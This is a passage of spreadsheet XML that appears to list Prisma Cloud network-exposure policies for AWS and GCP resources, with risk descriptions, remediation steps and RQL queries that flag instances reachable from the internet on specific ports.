        </is>
      </c>
      <c r="T3480" t="b">
        <v>0</v>
      </c>
      <c r="U3480" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3480" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3480" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances with network path from the internet (0.0.0.0/0) on ports 22/3389.
AWS EC2 instances with network path from the internet increases the risk of unauthorized access, cyber attacks, and data breaches, as it may provide a larger attack surface for malicious actors. Such instances are especially prone to brute force or vulnerability exploits. Port 22 and 2289 are frequently targeted ports and utilized for remote access using SSH and RDP protocols respectively, making them susceptible to attacks like brute force and vulnerability exposure/exploitation.
As a best practice, restrict traffic from unknown IP addresses and limit the access from known hosts, services, or specific entities.</t>
        </is>
      </c>
      <c r="X3480" t="inlineStr">
        <is>
          <t>Restrict Internet exposure of reported EC2 instances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t>
        </is>
      </c>
      <c r="Y3480" t="inlineStr"/>
      <c r="Z3480" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'Instance' and dest.cloud.type = 'AWS' and dest.resource.state = 'Active' and protocol.ports in ( 'tcp/22', 'tcp/3389' )</t>
        </is>
      </c>
      <c r="AA3480" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3480" t="inlineStr">
        <is>
          <t>2024-08-19 06:32:45</t>
        </is>
      </c>
      <c r="AC3480" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-1020</t>
        </is>
      </c>
      <c r="AD3480" t="b">
        <v>1</v>
      </c>
      <c r="AE3480" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3480" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG348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0" t="inlineStr">
        <is>
          <t>229d957a-d47b-41ea-8fb2-4f65a9cdcd1b</t>
        </is>
      </c>
      <c r="AI3480" t="inlineStr">
        <is>
          <t>2a69fea0-3867-47f9-a253-af35de0f522e</t>
        </is>
      </c>
      <c r="AJ3480" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3480" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3481">
      <c r="A3481" t="inlineStr"/>
      <c r="B3481" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3481" s="2" t="inlineStr"/>
      <c r="D3481" t="n">
        <v>0</v>
      </c>
      <c r="E3481" t="n">
        <v>177</v>
      </c>
      <c r="F3481" t="n">
        <v>2</v>
      </c>
      <c r="G3481" t="b">
        <v>1</v>
      </c>
      <c r="H348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81" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3481" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3481" t="inlineStr">
        <is>
          <t>AWS EC2 instance with network path to the internet (0.0.0.0/0)</t>
        </is>
      </c>
      <c r="L3481" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3481" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3481" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3481" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3481" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3481" t="inlineStr"/>
      <c r="R3481" t="inlineStr"/>
      <c r="S3481" t="inlineStr"/>
      <c r="T3481" t="b">
        <v>0</v>
      </c>
      <c r="U3481" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3481" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3481" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances with network path to the internet (0.0.0.0/0).
AWS EC2 instances with network path to the internet increases the risk of cyber attacks, crypto mining and data breaches which can be used by malicious actors. Such instances are especially prone to data exfiltration or mining exploits.
As a best practice, restrict traffic to unknown IP addresses and limit the access to known hosts, services, or specific entities.</t>
        </is>
      </c>
      <c r="X3481" t="inlineStr">
        <is>
          <t>Restrict EC2 instances with network path to the internet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outbound rules'
7. Update outbound rules that allow unrestricted access (0.0.0.0/0) such that the CIDR range 0.0.0.0/0 does not exist
8. Click 'Save rules' to apply the changes.</t>
        </is>
      </c>
      <c r="Y3481" t="inlineStr"/>
      <c r="Z3481" t="inlineStr">
        <is>
          <t>config from network where source.resource.type = 'Instance' and source.cloud.type = 'AWS' and dest.network = '0.0.0.0/0' and address.match.criteria = 'full_match'</t>
        </is>
      </c>
      <c r="AA3481" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3481" t="inlineStr">
        <is>
          <t>2024-08-19 06:32:45</t>
        </is>
      </c>
      <c r="AC3481" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-804</t>
        </is>
      </c>
      <c r="AD3481" t="b">
        <v>1</v>
      </c>
      <c r="AE3481" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3481" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG348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1" t="inlineStr">
        <is>
          <t>6c561dd0-e24b-4afe-b1fd-78808a45956d</t>
        </is>
      </c>
      <c r="AI3481" t="inlineStr">
        <is>
          <t>53aea291-327e-4ded-8035-d5b4354272ac</t>
        </is>
      </c>
      <c r="AJ3481" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3481" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3482">
      <c r="A3482" t="inlineStr"/>
      <c r="B3482" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3482" s="2" t="inlineStr"/>
      <c r="D3482" t="n">
        <v>2</v>
      </c>
      <c r="E3482" t="n">
        <v>1</v>
      </c>
      <c r="F3482" t="n">
        <v>0</v>
      </c>
      <c r="G3482" t="b">
        <v>1</v>
      </c>
      <c r="H348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 test-dish</t>
        </is>
      </c>
      <c r="I3482" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3482" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3482" t="inlineStr">
        <is>
          <t>AWS RDS instance with network path from the untrust internet source</t>
        </is>
      </c>
      <c r="L3482" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3482" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3482" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3482" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3482" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3482" t="inlineStr"/>
      <c r="R3482" t="inlineStr"/>
      <c r="S3482" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3482" t="b">
        <v>0</v>
      </c>
      <c r="U3482" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3482" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3482" t="inlineStr">
        <is>
          <t>This policy identifies AWS RDS instances with network path from untrusted internet source.
AWS RDS is AWS managed service for running relational databases in the cloud. Allowing an AWS RDS instance to be reachable from any untrusted internet source increases the risk of unauthorized access and potential security breaches due to expanded attack surface.
It is recommended to restrict traffic from untrusted IP addresses and limit the access to known hosts, services, or specific entities for the RDS Database instances.
NOTE: Prisma Cloud Trusted IP List allows administrators to specify a list of IP addresses that are considered trusted or safe.</t>
        </is>
      </c>
      <c r="X3482" t="inlineStr">
        <is>
          <t>Restrict access to the AWS RDS Instance by configuring Security group rules.
1. Sign in to the AWS Console
2. Navigate to the RDS Dashboard
3. In the 'Databases' section, Select the reported RDS instance you want to restrict public access
4. Click on the RDS instance to open its details
5. Go to the 'Connectivity &amp; security' tab
6. For each security group listed under the 'Security group rules' section:
    6a. Select the security group and Click 'Edit inbound rules'
    6b. Review and update inbound rules to add the IP addresses from Trusted IP Addresses that allow unrestricted access (0.0.0.0/0) or any untrusted IP ranges, ensuring that such CIDR ranges no longer exist.
  6c. Click 'Save rules' to apply the changes</t>
        </is>
      </c>
      <c r="Y3482" t="inlineStr"/>
      <c r="Z3482" t="inlineStr">
        <is>
          <t>config from network where source.network = UNTRUST_INTERNET and dest.resource.type = 'PaaS' and dest.cloud.type = 'AWS' and dest.paas.service.type = 'AWS RDS'</t>
        </is>
      </c>
      <c r="AA3482" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3482" t="inlineStr">
        <is>
          <t>2024-08-19 06:32:41</t>
        </is>
      </c>
      <c r="AC3482" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-1242</t>
        </is>
      </c>
      <c r="AD3482" t="b">
        <v>1</v>
      </c>
      <c r="AE3482" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3482" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG348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t>
        </is>
      </c>
      <c r="AH3482" t="inlineStr">
        <is>
          <t>9430eb76-ac5b-44fe-9cef-0d8610f91266</t>
        </is>
      </c>
      <c r="AI3482" t="inlineStr">
        <is>
          <t>105a5c77-777d-4a7f-9b21-0ccd15f27011</t>
        </is>
      </c>
      <c r="AJ3482" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3482" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3483">
      <c r="A3483" t="inlineStr"/>
      <c r="B3483" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3483" s="2" t="inlineStr"/>
      <c r="D3483" t="inlineStr"/>
      <c r="E3483" t="inlineStr"/>
      <c r="F3483" t="inlineStr"/>
      <c r="G3483" t="b">
        <v>1</v>
      </c>
      <c r="H348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83" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3483" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3483" t="inlineStr">
        <is>
          <t>AWS EKS K8s service with network path from the untrust internet source on ports with high risk</t>
        </is>
      </c>
      <c r="L3483" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3483" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3483" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3483" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3483" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3483" t="inlineStr"/>
      <c r="R3483" t="inlineStr"/>
      <c r="S3483" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3483" t="b">
        <v>0</v>
      </c>
      <c r="U3483" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3483" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3483" t="inlineStr">
        <is>
          <t>This policy identifies AWS EKS Kubernetes services with a network path from the untrusted internet source on ports with high risk.
AWS EKS Kubernetes services exposed to untrusted internet sources on high-risk ports increase the risk of unauthorized access, cyber-attacks, and data breaches, as they present a larger attack surface for malicious actors. These container services are particularly vulnerable to brute force attacks and exploits targeting known vulnerabilities.
As a best practice, it is recommended to allow access from the Trusted IP list and limit access from known hosts, services, or specific entities.
Note: Prisma Cloud's Trusted IP List feature allows administrators to specify a list of IP addresses that are considered trusted or safe.</t>
        </is>
      </c>
      <c r="X3483" t="inlineStr">
        <is>
          <t>The following steps are recommended to restrict AWS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necessary changes and ensure no other resources have been impacted due to these changes:
 a) The overly permissive security group rules can be made more restrictive to Trusted IP lists.
 b) Move the container/application inside a restrictive subnet if public accessibility is not required.
 c) Control access to service by specifying allowed IP addresses or ranges in the service configuration.</t>
        </is>
      </c>
      <c r="Y3483" t="inlineStr"/>
      <c r="Z3483" t="inlineStr">
        <is>
          <t>config from network where source.network = UNTRUST_INTERNET and dest.resource.type = 'K8s Service' and dest.cloud.type = 'AWS' and protocol.ports in ( 'tcp/20:21', 'tcp/23', 'tcp/25', 'tcp/110', 'tcp/135', 'tcp/143', 'tcp/445', 'tcp/1433:1434', 'tcp/3000', 'tcp/3306', 'tcp/4333', 'tcp/5000', 'tcp/5432', 'tcp/5500', 'tcp/5601', 'tcp/8080', 'tcp/8088', 'tcp/8888', 'tcp/9200', 'tcp/9300' )</t>
        </is>
      </c>
      <c r="AA3483" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3483" t="inlineStr">
        <is>
          <t>2024-11-11 04:27:10</t>
        </is>
      </c>
      <c r="AC3483" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-1303</t>
        </is>
      </c>
      <c r="AD3483" t="b">
        <v>1</v>
      </c>
      <c r="AE3483" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3483" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG348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83" t="inlineStr">
        <is>
          <t>8fe3e2e3-5735-4da5-80f8-38375e39073b</t>
        </is>
      </c>
      <c r="AI3483" t="inlineStr">
        <is>
          <t>a88cd3ca-d4a7-4a18-b113-a3ceee6202e2</t>
        </is>
      </c>
      <c r="AJ3483" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3483" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3484">
      <c r="A3484" t="inlineStr"/>
      <c r="B3484" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3484" s="2" t="inlineStr"/>
      <c r="D3484" t="inlineStr"/>
      <c r="E3484" t="inlineStr"/>
      <c r="F3484" t="inlineStr"/>
      <c r="G3484" t="b">
        <v>1</v>
      </c>
      <c r="H348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84" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3484" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3484" t="inlineStr">
        <is>
          <t>AWS EKS K8s service with network path from the internet (0.0.0.0/0) on ports 80/443</t>
        </is>
      </c>
      <c r="L3484" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M3484" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3484" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3484" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3484" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3484" t="inlineStr"/>
      <c r="R3484" t="inlineStr"/>
      <c r="S3484" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3484" t="b">
        <v>0</v>
      </c>
      <c r="U3484" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3484" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3484" t="inlineStr">
        <is>
          <t>This policy identifies AWS EKS K8s services that have network paths open to the internet (0.0.0.0/0) on ports 80 or 443.
Exposing container services to the internet increases the risk of unauthorized access, cyber attacks, and data breaches by expanding the attack surface for malicious actors. Services open on ports 80 and 443, which are used for HTTP and HTTPS protocols, are particularly vulnerable to attacks such as brute force attempts, vulnerability exploits, cross-site scripting (XSS), SQL injections, cross-site request forgeries (CSRF), and DDoS attacks.
As a best practice, restrict traffic from unknown IP addresses and limit access to trusted hosts, services, or specific entities.</t>
        </is>
      </c>
      <c r="X3484" t="inlineStr">
        <is>
          <t>The following steps are recommended to restrict AWS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necessary changes and ensure no other resources have been impacted due to these changes:
 a) The overly permissive security group rules can be made more restrictive.
 b) Move the container/application inside a restrictive subnet if public accessibility is not required.
 c) Control access to service by specifying allowed IP addresses or ranges in the service configuration.</t>
        </is>
      </c>
      <c r="Y3484" t="inlineStr"/>
      <c r="Z3484" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'K8s Service' and dest.cloud.type = 'AWS' and protocol.ports in ( 'tcp/80' , 'tcp/443' )</t>
        </is>
      </c>
      <c r="AA3484" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3484" t="inlineStr">
        <is>
          <t>2024-11-11 04:27:07</t>
        </is>
      </c>
      <c r="AC3484" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-1300</t>
        </is>
      </c>
      <c r="AD3484" t="b">
        <v>1</v>
      </c>
      <c r="AE3484" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3484" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG348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84" t="inlineStr">
        <is>
          <t>4157a1ed-9145-4afa-8369-6d0b7a5683bf</t>
        </is>
      </c>
      <c r="AI3484" t="inlineStr">
        <is>
          <t>2c9c4c1b-a08e-45a8-823a-bfc2abad2e37</t>
        </is>
      </c>
      <c r="AJ3484" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3484" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3485">
      <c r="A3485" t="inlineStr"/>
      <c r="B3485" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3485" s="2" t="inlineStr"/>
      <c r="D3485" t="inlineStr"/>
      <c r="E3485" t="inlineStr"/>
      <c r="F3485" t="inlineStr"/>
      <c r="G3485" t="b">
        <v>1</v>
      </c>
      <c r="H348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85" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3485" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3485" t="inlineStr">
        <is>
          <t>AWS EKS K8s service with network path from the internet (0.0.0.0/0)</t>
        </is>
      </c>
      <c r="L3485" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3485" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3485" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3485" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3485" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3485" t="inlineStr"/>
      <c r="R3485" t="inlineStr"/>
      <c r="S3485" t="inlineStr">
        <is>
          <t>Attack Path Rule,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3485" t="b">
        <v>0</v>
      </c>
      <c r="U3485" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3485" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3485" t="inlineStr">
        <is>
          <t>This policy identifies AWS EKS K8s services with network path from the internet (0.0.0.0/0).
Container services exposed to the internet increases the risk of unauthorized access, cyber attacks, and data breaches, as they present a larger attack surface for malicious actors. These services are particularly vulnerable to brute force attacks and exploitation of known vulnerabilities.
As a best practice, restrict traffic from unknown IP addresses and limit access to trusted hosts, services, or specific entities.</t>
        </is>
      </c>
      <c r="X3485" t="inlineStr">
        <is>
          <t>The following steps are recommended to restrict AWS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container/app service inside a restrictive subnet if it does not need to be publicly accessible.
 c) Control access to service by specifying allowed IP addresses or ranges in the service configuration.</t>
        </is>
      </c>
      <c r="Y3485" t="inlineStr"/>
      <c r="Z3485" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'K8s Service' and dest.cloud.type = 'AWS' and effective.action = 'Allow'</t>
        </is>
      </c>
      <c r="AA3485" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3485" t="inlineStr">
        <is>
          <t>2024-10-14 06:35:06</t>
        </is>
      </c>
      <c r="AC3485" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-1094</t>
        </is>
      </c>
      <c r="AD3485" t="b">
        <v>1</v>
      </c>
      <c r="AE3485" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3485" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG348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5" t="inlineStr">
        <is>
          <t>613f9585-be6b-43ed-ab2a-e89b7d6c036b</t>
        </is>
      </c>
      <c r="AI3485" t="inlineStr">
        <is>
          <t>5da50323-01a4-4f1a-9ccf-733813838e37</t>
        </is>
      </c>
      <c r="AJ3485" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3485" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3486">
      <c r="A3486" t="inlineStr"/>
      <c r="B3486" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3486" s="2" t="inlineStr"/>
      <c r="D3486" t="inlineStr"/>
      <c r="E3486" t="inlineStr"/>
      <c r="F3486" t="inlineStr"/>
      <c r="G3486" t="b">
        <v>1</v>
      </c>
      <c r="H348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86" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3486" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3486" t="inlineStr">
        <is>
          <t>AWS EC2 instance with network path from the internet (0.0.0.0/0) on ports 80/443</t>
        </is>
      </c>
      <c r="L3486" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3486" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3486" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3486" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3486" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3486" t="inlineStr"/>
      <c r="R3486" t="inlineStr"/>
      <c r="S3486" t="inlineStr">
        <is>
          <t>Attack Path Rule,network _config</t>
        </is>
      </c>
      <c r="T3486" t="b">
        <v>0</v>
      </c>
      <c r="U3486" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3486" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3486" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances with network path from the internet (0.0.0.0/0) on ports 80/443.
AWS EC2 instances with network path from the internet increases the risk of unauthorized access, cyber attacks, and data breaches, as it may provide a larger attack surface for malicious actors. Such instances are especially prone to brute force or vulnerability exploits. Port 80 and 443 are frequently targeted ports and utilized for HTTP and HTTPS protocols, making them susceptible to attacks like cross-site scripting, SQL injections, cross-site request forgeries, and DDoS attacks.
As a best practice, restrict traffic from unknown IP addresses and limit the access from known hosts, services, or specific entities.</t>
        </is>
      </c>
      <c r="X3486" t="inlineStr">
        <is>
          <t>Restrict Internet exposure of reported EC2 instances based on your business requirements by modifying security group rules to the trusted IP address
1. Sign in to the AWS Console
2. Navigate to EC2 Dashboard
3. Identify the reported EC2 instances that you want to restrict public access
4. Go to the 'Security' tab
5. For each security group listed under the 'Security group' section
6. Select 'Edit inbound rules'
7. Update inbound rules that allow unrestricted access (0.0.0.0/0) such that the CIDR range 0.0.0.0/0 does not exist
8. Click 'Save rules' to apply the changes.</t>
        </is>
      </c>
      <c r="Y3486" t="inlineStr"/>
      <c r="Z3486" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'Instance' and dest.cloud.type = 'AWS' and protocol.ports in ( 'tcp/80' , 'tcp/443' )</t>
        </is>
      </c>
      <c r="AA3486" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3486" t="inlineStr">
        <is>
          <t>2024-08-19 06:32:45</t>
        </is>
      </c>
      <c r="AC3486" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-1075</t>
        </is>
      </c>
      <c r="AD3486" t="b">
        <v>1</v>
      </c>
      <c r="AE3486" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3486" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG348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6" t="inlineStr">
        <is>
          <t>278e5db6-c6d2-4f73-9734-b1d22a3fd95e</t>
        </is>
      </c>
      <c r="AI3486" t="inlineStr">
        <is>
          <t>186c4a23-2f93-4b6f-8844-ba9f0006c115</t>
        </is>
      </c>
      <c r="AJ3486" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3486" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3487">
      <c r="A3487" t="inlineStr"/>
      <c r="B3487" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3487" s="2" t="inlineStr"/>
      <c r="D3487" t="n">
        <v>12461</v>
      </c>
      <c r="E3487" t="n">
        <v>117</v>
      </c>
      <c r="F3487" t="n">
        <v>313</v>
      </c>
      <c r="G3487" t="b">
        <v>1</v>
      </c>
      <c r="H348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87" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3487" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3487" t="inlineStr">
        <is>
          <t>GCP VM instance with network path from the untrust internet source on ports with high risk</t>
        </is>
      </c>
      <c r="L3487" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3487" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3487" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3487" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3487" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3487" t="inlineStr"/>
      <c r="R3487" t="inlineStr"/>
      <c r="S3487" t="inlineStr">
        <is>
          <t>network_config,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3487" t="b">
        <v>0</v>
      </c>
      <c r="U3487" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3487" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3487" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances with network path from the untrust internet source on ports with high risk.
GCP VM instances with network path from the untrust internet source on ports with high risk increases the risk of unauthorized access, cyber attacks, and data breaches, as it may provide a larger attack surface for malicious actors. Such instances are especially prone to brute force or vulnerability exploits.
As a best practice, it is recommended to allow access from Trusted IP list and limit the access from known hosts, services, or specific entities.
NOTE: Prisma Cloud Trusted IP List allows administrators to specify a list of IP addresses that are considered trusted or safe.</t>
        </is>
      </c>
      <c r="X3487" t="inlineStr">
        <is>
          <t>Restrict access to GCP VM instance by modifying VPC Firewall rules
1. Login to the GCP Console
2. Go to 'VM instance'
3. Identify the VM instance that you want to restrict Internet access
4. Update the VPC firewall rules to allow IP addresses from Trusted IP Addresses.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t>
        </is>
      </c>
      <c r="Y3487" t="inlineStr"/>
      <c r="Z3487" t="inlineStr">
        <is>
          <t>config from network where source.network = UNTRUST_INTERNET and dest.resource.type = 'Instance' and dest.cloud.type = 'GCP' and dest.resource.state = 'Active' and protocol.ports in ( 'tcp/20:21', 'tcp/23', 'tcp/25', 'tcp/110', 'tcp/135', 'tcp/143', 'tcp/445', 'tcp/1433:1434', 'tcp/3000', 'tcp/3306', 'tcp/4333', 'tcp/5000', 'tcp/5432', 'tcp/5500', 'tcp/5601', 'tcp/8080', 'tcp/8088', 'tcp/8888', 'tcp/9200', 'tcp/9300' )</t>
        </is>
      </c>
      <c r="AA3487" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3487" t="inlineStr">
        <is>
          <t>2024-08-19 06:32:45</t>
        </is>
      </c>
      <c r="AC3487" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-1011</t>
        </is>
      </c>
      <c r="AD3487" t="b">
        <v>1</v>
      </c>
      <c r="AE3487" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3487" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG348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7" t="inlineStr">
        <is>
          <t>e7f7bfbc-0c7f-4a1e-9cb3-270ab5b6c180</t>
        </is>
      </c>
      <c r="AI3487" t="inlineStr">
        <is>
          <t>7b564a5a-f441-433f-adbf-8ada84b34c9a</t>
        </is>
      </c>
      <c r="AJ3487" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3487" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3488">
      <c r="A3488" t="inlineStr"/>
      <c r="B3488" s="2" t="inlineStr">
        <is>
